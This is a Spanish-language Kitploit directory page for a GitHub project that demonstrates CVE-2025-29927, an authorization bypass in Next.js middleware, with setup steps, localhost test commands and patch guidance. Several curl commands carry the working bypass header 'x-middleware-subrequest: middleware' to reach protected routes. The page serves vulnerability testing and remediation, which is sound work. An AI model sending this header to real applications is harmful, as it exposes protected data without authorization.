Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
claude-create-CVE-2025-29927 — Prueba y demuestra CVE-2025-29927, un bypass de autorización de middleware en Next.js. Incluye scripts de prueba de explotación y de acceso normal, además de una guía de remediación. | Kitploit
Herramientas/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebAprendizaje y Educación
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

Prueba y demuestra CVE-2025-29927, un bypass de autorización de middleware en Next.js. Incluye scripts de prueba de explotación y de acceso normal, además de una guía de remediación.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Probador de Vulnerabilidad de Middleware de Next.js (CVE-2025-29927)

Esta aplicación demuestra la vulnerabilidad de omisión de autorización del middleware de Next.js (CVE-2025-29927).

Acerca de la Vulnerabilidad

CVE-2025-29927 es una vulnerabilidad de omisión de autorización en el middleware de Next.js. Al enviar una cabecera HTTP especialmente diseñada (x-middleware-subrequest), un atacante puede eludir las comprobaciones de autorización implementadas en el middleware, obteniendo potencialmente acceso a recursos protegidos.

Instrucciones de Configuración

  1. Instalar dependencias:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. Ejecutar el servidor de desarrollo:

    root@kitploit:~
    npm run dev
    
  3. El servidor se iniciará en http://localhost:3000

Probando la Vulnerabilidad

Acceso Normal (Debería Estar Bloqueado)

Intente acceder a la ruta protegida normalmente:

root@kitploit:~
npm run test-normal

o

root@kitploit:~
curl -v http://localhost:3000/protected-data

Debería recibir una respuesta 401 No Autorizado, ya que el middleware bloquea el acceso.

Explotando la Vulnerabilidad

Intente acceder a la ruta protegida con la cabecera de explotación:

root@kitploit:~
npm run test-exploit

o

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

Si la aplicación es vulnerable, recibirá una respuesta 200 OK con los datos protegidos.

Probando la Ruta API

Acceso normal (debería estar bloqueado):

root@kitploit:~
curl -v http://localhost:3000/api/protected

Con explotación:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Mitigación

Para corregir esta vulnerabilidad, debe:

  1. Actualizar Next.js a una versión parcheada:

    • Next.js 15.x: Actualizar a 15.2.3 o posterior
    • Next.js 14.x: Actualizar a 14.2.25 o posterior
    • Next.js 13.x: Actualizar a 13.5.9 o posterior
    • Next.js 12.x: Actualizar a 12.3.5 o posterior
  2. Si no puede actualizar, implemente un proxy inverso (como Nginx o Cloudflare) que elimine la cabecera x-middleware-subrequest de las solicitudes entrantes.

Comandos de Prueba Adicionales

Pruebe si la ruta API es vulnerable:

root@kitploit:~
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad. Úsela para verificar si sus propias aplicaciones Next.js son vulnerables y necesitan ser parcheadas.

Descargar herramienta